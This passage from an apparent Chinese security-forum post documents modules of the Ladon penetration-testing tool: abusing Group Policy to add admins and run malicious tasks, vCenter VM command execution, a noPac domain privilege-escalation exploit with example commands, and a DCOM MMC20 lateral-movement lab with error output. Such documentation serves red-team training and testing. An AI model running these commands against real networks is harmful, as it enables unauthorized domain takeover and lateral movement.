  13.   Add a new computer immediate task
  14. --AddUserTask
  15.   Add a new user immediate task


  16. Options required to add a new local admin:
  17. --UserAccount
  18.   Set the name of the account to be added in local admins.
  19. --GPOName
  20.   The name of the vulnerable GPO.


  21. Options required to add a new user startup script:
  22. --ScriptName
  23.   Set the name of the new startup script.
  24. --ScriptContents
  25.   Set the contents of the new startup script.
  26. --GPOName
  27.   The name of the vulnerable GPO.


  28. Options required to add a new computer startup script:
  29. --ScriptName
  30.   Set the name of the new startup script.
  31. --ScriptContents
  32.   Set the contents of the new startup script.
  33. --GPOName
  34.   The name of the vulnerable GPO.


  35. Options required to add new user rights:
  36. --UserRights
  37.   Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
  38. --UserAccount
  39.   Set the account to add the new rights.
  40. --GPOName
  41.   The name of the vulnerable GPO.


  42. Options required to add a new computer immediate task:
  43. --TaskName
  44.   Set the name of the new computer task.
  45. --Author
  46.   Set the author of the new task (use a DA account).
  47. --Command
  48.   Command to execute.
  49. --Arguments
  50.   Arguments passed to the command.
  51. --GPOName
  52.   The name of the vulnerable GPO.
  53. Additional Options:
  54. --FilterEnabled
  55.   Enable Target Filtering for computer immediate tasks.
  56. --TargetDnsName
  57.   The DNS name of the computer to target. The malicious task will run only on the specified host.


  58. Options required to add a new user immediate task:
  59. --TaskName
  60.   Set the name of the user new task.
  61. --Author
  62.   Set the author of the new task (use a DA account).
  63. --Command
  64.   Command to execute.
  65. --Arguments
  66.   Arguments passed to the command.
  67. --GPOName
  68.   The name of the vulnerable GPO.
  69. Additional Options:
  70. --FilterEnabled
  71.   Enable Target Filtering for user immediate tasks.
  72. --TargetUsername
  73.   The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
  74. --TargetUserSID
  75.   The targeted user's SID.


  76. Other options:
  77. --DomainController
  78.   Set the target domain controller.
  79. --Domain
  80.   Set the target domain.
  81. --Force
  82.   Overwrite existing files if required.
复制代码

0x006  域渗透SharpGPO
Ladon SharpGPO
  1. Load SharpGPO

  2. Usage:
  3.     Ladon SharpGPO --Action <Action> <Options>

  4.     Actions:
  5.         --Action
  6.             GetOU                     List all OUs.
  7.             NewOU                     Create an new OU.
  8.             RemoveOU                  Remove an OU.
  9.             MoveObject                Move an AD Object to an OU / Remove an AD Object from an OU.
  10.             GetGPO                    List all names and GUIDs of GPOs.
  11.             NewGPO                    Create a new GPO.
  12.             RemoveGPO                 Delete a GPO.
  13.             GetGPLink                 List all gPLinks of domain, ou and sites.
  14.             NewGPLink                 Create a new GpLink.
  15.             RemoveGPLink              Delete a GpLink from OU.
  16.             GetSecurityFiltering      List security filterings of the target GPO.
  17.             NewSecurityFiltering      Create a new security filtering.
  18.             RemoveSecurityFiltering   Delete a security filtering from GPO.

  19.     Options:
  20.         --DomainController            Set ip/hostname of the domain controller.
  21.         --Domain                      Set the target domain FQDN (e.g test.com).
  22.         --OUName                      Set an OU name.
  23.         --GPOName                     Set a GPO name.
  24.         --GUID                        Set the GUID of the GPO.
  25.         --DN                          Distinguished name of the target OU, domain or sites (e.g CN=IT Support,DC=testad,DC=com).
  26.         --SrcDN                       Distinguished name of an AD Object, used by MoveObject.
  27.         --DstDN                       Distinguished name of an AD Object, used by MoveObject.
  28.         --BaseDN                      Distinguished name of an AD Object, used by NewOU.
  29.         --DomainGroup                 Domain group name.
  30.         --DomainUser                  Domain user name.
  31.         --DomainComputer              Domain computer name.
  32.         --NTAccount                   NtAccount name.
  33.         -h/--Help                     Display help menu.

  34.     Examples:
  35.         Ladon SharpGPO -h

  36.         # OU Operations
  37.         Ladon SharpGPO --Action GetOU
  38.         Ladon SharpGPO --Action GetOU --OUName "IT Support"

  39.         Ladon SharpGPO --Action NewOU --OUName "IT Support"
  40.         Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

  41.         Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
  42.         Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

  43.         Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
  44.         Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"

  45.         # GPO Operations
  46.         Ladon SharpGPO --Action GetGPO
  47.         Ladon SharpGPO --Action GetGPO --GPOName testgpo

  48.         Ladon SharpGPO --Action NewGPO --GPOName testgpo

  49.         Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
  50.         Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

  51.         Ladon SharpGPO --Action GetGPLink
  52.         Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
  53.         Ladon SharpGPO --Action GetGPLink --GPOName testgpo
  54.         Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

  55.         Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
  56.         Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

  57.         Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
  58.         Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

  59.         Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
  60.         Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

  61.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
  62.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
  63.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
  64.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
  65.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
  66.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
  67.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
  68.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

  69.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
  70.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
  71.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
  72.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
  73.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
  74.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
  75.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
  76.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
复制代码

0x007 SharpSphere vCenter管理虚拟机交互执行命令工具
Ladon SharpSphere
  1. C:\Users\k8gege>Ladon SharpSphere
  2. 11.6.0.0
  3. Copyright ?  2023

  4. ERROR(S):
  5.   No verb selected.

  6.   dump        Snapshot and download memory dump file

  7.   list        List all VMs managed by this vCenter

  8.   execute     Execute given command in target VM

  9.   c2          Run C2 using C3's VMwareShareFile module

  10.   upload      Upload file to target VM

  11.   download    Download file from target VM

  12.   help        Display more information on a specific command.

  13.   version     Display version information.
复制代码

0x008 域渗透 域内提权CVE-2021-42287/CVE-2021-42278
Ladon noPac
  1. CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

  2. /domain /user /pass argument needed for scanning
  3. /dc /mAccount /nPassword argument needed for exploitation

  4. Examples:
  5.   Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  6.   Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  7.   Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  8.   Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
复制代码

0x009 Wiki文档搜索模块
例子:在update.txt里搜索 横向移动 都有哪些模块或功能可用,也可以在Github上的Ladon简明使用教程,查看命令用法
0x010 Dcom远程执行实验
攻击机: Win7、Win8、Win10或任意机器   IP: 192.168.9.8
服务器: Win2012或其它win操作系统,关闭防火墙 IP: 192.168.9.11
两台机器使用相同用户密码登陆,被攻击机登陆用户为管理员
攻击机打开的cmd可以是非管理员权限,指定IP即可在服务器执行命令
命令无回显,可通过重定向输出TXT查看命令执行结果
  1. Ladon MmcExec 192.168.9.11 "whoami > c:\1.txt"
复制代码

Dcom没有具体端口(所以关闭防火墙实验)
对于 MMC20.Application 这个 COM 组件,它本身并没有固定的端口号。MMC(Microsoft Management Console)是一个管理控制台框架,它允许你加载各种管理插件(Snap-in),每个插件都可以提供不同的功能和使用不同的端口。

具体的端口号取决于所加载的插件或扩展程序。例如,如果你使用 MMC20.Application 加载了远程桌面(Remote Desktop)插件,那么远程桌面会使用默认的端口号3389。如果你使用 MMC20.Application 加载了 IIS(Internet Information Services)插件,那么 IIS 可能会使用默认的端口号80(HTTP)或443(HTTPS)。

因此,要确定具体的端口号,需要查看你加载的具体插件的配置信息或文档。不同的插件可能使用不同的端口号进行通信。
注: 系统用户密码不一致无法横向执行 单纯修改密码不行 一定要重启登陆
当然也可以在IPC连接或Mimikatz注入hash后的CMD上执行
2012开启防火墙 同用户密码Win7报错   
  1. 使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.50.18 为 CLS
  2. ID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F889} 的远程组件检索 COM 类工厂失败,原
  3. 因是出现以下错误: 800706ba。”
复制代码

2012关闭防火墙 Win7


网络不通报错
  1. 使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.50.18 为 CLSID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F
  2. 889} 的远程组件检索 COM 类工厂失败,原因是出现以下错误: 800706ba。”
  3. 所在位置 行:1 字符: 28
  4. + [activator]::CreateInstance <<<< ([type]::GetTypeFromProgID("MMC20.Application","192.168.50.18")).Document.ActiveView
  5. .ExecuteShellCommand('cmd.exe',$null,"/c whoami > c:\users\public\test.txt","Minimzed")
  6.     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
  7.     + FullyQualifiedErrorId : DotNetMethodException
复制代码


不同用户同密码、同用户不同密码 报错
  1. 使用“1”个参数调用“CreateInstance”时发生异常:“从计算机 192.168.50.18 为 CLS
  2. ID 为 {49B2791A-B1AE-4C90-9B8E-E860BA07F889} 的远程组件检索 COM 类工厂失败,原
  3. 因是出现以下错误: 80070005。”
  4. 所在位置 行:1 字符: 28
复制代码

Win8同用户 密码不一致
  1. Exception calling "CreateInstance" with "1" argument(s): "Retrieving the COM
  2. class factory for remote component with CLSID
  3. {49B2791A-B1AE-4C90-9B8E-E860BA07F889} from machine 192.168.50.18 failed due
  4. to the following error: 80070005 192.168.50.18."
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 09:35 , Processed in 0.015153 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表